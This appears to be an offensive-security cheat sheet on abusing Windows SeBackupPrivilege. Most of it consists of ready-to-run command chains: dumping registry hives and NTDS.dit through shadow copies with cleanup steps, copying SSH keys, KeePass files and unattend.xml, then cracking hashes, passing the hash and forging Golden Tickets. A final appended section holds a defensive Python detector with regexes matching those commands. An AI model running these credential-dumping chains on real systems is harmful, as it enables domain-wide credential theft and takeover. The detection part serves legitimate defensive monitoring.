Overview

SeBackupPrivilege lets a process read any file regardless of its DACL: opening a file with backup semantics bypasses the normal access check. Everything becomes readable: SAM/SYSTEM/SECURITY hives, NTDS.dit, SSH keys, KeePass DBs. Granted by default to BUILTIN\Administrators and BUILTIN\Backup Operators. On a DC, Backup Operators is a domain-level group → any member can dump the whole AD database.

Check If Enabled

whoami /priv | findstr /i "SeBackupPrivilege"
SeBackupPrivilege             Back up files and directories  Enabled
Shows Disabled? Still usable — the privilege only needs to be present in the token; enable it at runtime (Set-SeBackupPrivilege or AdjustTokenPrivileges).

Dump SAM & SYSTEM (Local Hashes)

reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY
Transfer and extract:
impacket-smbserver share . -smb2support
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
# or
pypykatz registry SYSTEM --sam SAM --security SECURITY
Pass the hash:
impacket-psexec Administrator@TARGET -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
evil-winrm -i TARGET -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0

Read Any File — robocopy /B

/B = backup mode, ignores ACLs.
robocopy /B C:\Users\Administrator\Desktop C:\Temp report.txt
robocopy /B /E C:\Users\Administrator\ C:\Temp\admin_home\
High-value targets:
# SSH keys
robocopy /B C:\Users\Administrator\.ssh C:\Temp id_rsa
# KeePass
robocopy /B C:\Users\Administrator\Documents C:\Temp *.kdbx
# PowerShell history
robocopy /B C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine C:\Temp ConsoleHost_history.txt
# Unattend/Sysprep (plaintext creds)
robocopy /B C:\Windows\Panther C:\Temp unattend.xml
# IIS config (connection strings)
robocopy /B C:\Windows\System32\inetsrv\config C:\Temp applicationHost.config

Read via PowerShell (Backup Semantics)

When robocopy is unavailable, use the two DLLs shipped by the SeBackupPrivilege PowerShell module (SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll):
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege "C:\Users\Administrator\Desktop\secret.txt" C:\Temp\secret.txt

Dump NTDS.dit (Domain Controller)

NTDS.dit is locked by AD — copy it from a Volume Shadow Copy.

1. diskshadow script

@"
set context persistent nowriters
add volume C: alias myvolume
create
expose %myvolume% Z:
"@ | Set-Content C:\Temp\shadow.txt

2. Run + copy + clean up

diskshadow /s C:\Temp\shadow.txt
robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
reg save HKLM\SYSTEM C:\Temp\SYSTEM
echo delete shadows volume C: > C:\Temp\cleanup.txt
echo reset >> C:\Temp\cleanup.txt
diskshadow /s C:\Temp\cleanup.txt
diskshadow.exe only ships on Windows Server, not 10/11. Run it from C:\Windows\System32 if you hit errors.

Alternative — wbadmin

If diskshadow is blocked, use wbadmin instead (it requires the Windows Server Backup feature to be installed):
wbadmin start backup -backuptarget:C:\Temp -include:C:\Windows\NTDS\ntds.dit -quiet

Extract + use

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -outputfile dump
hashcat -m 1000 dump.ntds /usr/share/wordlists/rockyou.txt
# Golden Ticket from krbtgt hash
impacket-ticketer -domain DOMAIN.LOCAL -domain-sid S-1-5-21-... -nthash <krbtgt_hash> -groups 512 Administrator

Combine with SeRestorePrivilege

Backup Operators usually hold both → read AND write any file. With write access (overwrite utilman.exe, service binaries, DLL hijack) you get SYSTEM. See SeRestorePrivilege.

Quick Reference

| Technique | Requirements | Impact |
| --- | --- | --- |
| reg save SAM/SYSTEM | SeBackup | Local admin hashes |
| robocopy /B | SeBackup | Read any file |
| PowerShell backup semantics | SeBackup + DLLs | Read any file |
| diskshadow + robocopy NTDS.dit | SeBackup + DC | All domain hashes |
| wbadmin NTDS.dit | SeBackup + DC + feature | All domain hashes |
| Overwrite utilman / DLL hijack | SeBackup + SeRestore | SYSTEM shell |
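Every technique in the table above leaves a distinctive process command line (reg save of a hive, robocopy /B, diskshadow /s, wbadmin against NTDS), so the chain is easy to catch from process-creation telemetry. The following detection helper is an added example, not part of the original page: it classifies Sysmon Event ID 1 / Security 4688 style records against those command lines and raises an alert for any account not on a backup allow-list. The account name CORP\svc_backup and all sample records are constructed.

```python
import re

# One regex per technique from the cheat sheet, matched case-insensitively
# against the full command line of a process-creation event.
PATTERNS = {
    "reg_save_hive": re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b", re.I),
    "robocopy_backup_mode": re.compile(r"\brobocopy(\.exe)?\b.*\s/B\b", re.I),
    "diskshadow_script": re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I),
    "wbadmin_ntds": re.compile(r"\bwbadmin(\.exe)?\s+start\s+backup\b.*ntds\.dit", re.I),
    "ntds_path": re.compile(r"\\Windows\\NTDS\b", re.I),
}
# Techniques that only make sense on a DC against the AD database: escalate these.
DC_TECHNIQUES = {"diskshadow_script", "wbadmin_ntds", "ntds_path"}
# Accounts expected to run backup tooling (constructed value); everyone else is suspect.
ALLOWED_BACKUP_ACCOUNTS = {r"CORP\svc_backup"}

def classify(record):
    """Names of the techniques whose pattern matches this record's command line."""
    cmd = record.get("CommandLine", "")
    return [name for name, rx in PATTERNS.items() if rx.search(cmd)]

def triage(records):
    """One alert per record that matches a pattern and was not run by an
    allow-listed backup account; severity is 'high' when a DC technique is involved."""
    alerts = []
    for rec in records:
        hits = classify(rec)
        if not hits or rec.get("User") in ALLOWED_BACKUP_ACCOUNTS:
            continue
        alerts.append({
            "host": rec.get("Computer"), "user": rec.get("User"), "techniques": hits,
            "severity": "high" if DC_TECHNIQUES & set(hits) else "medium",
        })
    return alerts

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 fields).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "User": r"CORP\jdoe", "CommandLine": r"reg save HKLM\SAM C:\Temp\SAM"},
    {"Computer": "DC01", "User": r"CORP\jdoe", "CommandLine": r"robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit"},
    {"Computer": "DC01", "User": r"CORP\svc_backup",
     "CommandLine": r"wbadmin start backup -backuptarget:E: -include:C:\Windows\NTDS\ntds.dit -quiet"},
    {"Computer": "FS01", "User": r"CORP\jdoe", "CommandLine": r"robocopy C:\Data D:\Data /E"},
    {"Computer": "DC01", "User": r"CORP\jdoe", "CommandLine": r"diskshadow /s C:\Temp\shadow.txt"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Pair this with Security Event ID 4674 (privileged operation using SeBackupPrivilege) and periodic audits of Backup Operators membership to cover tooling that does not show up on a command line.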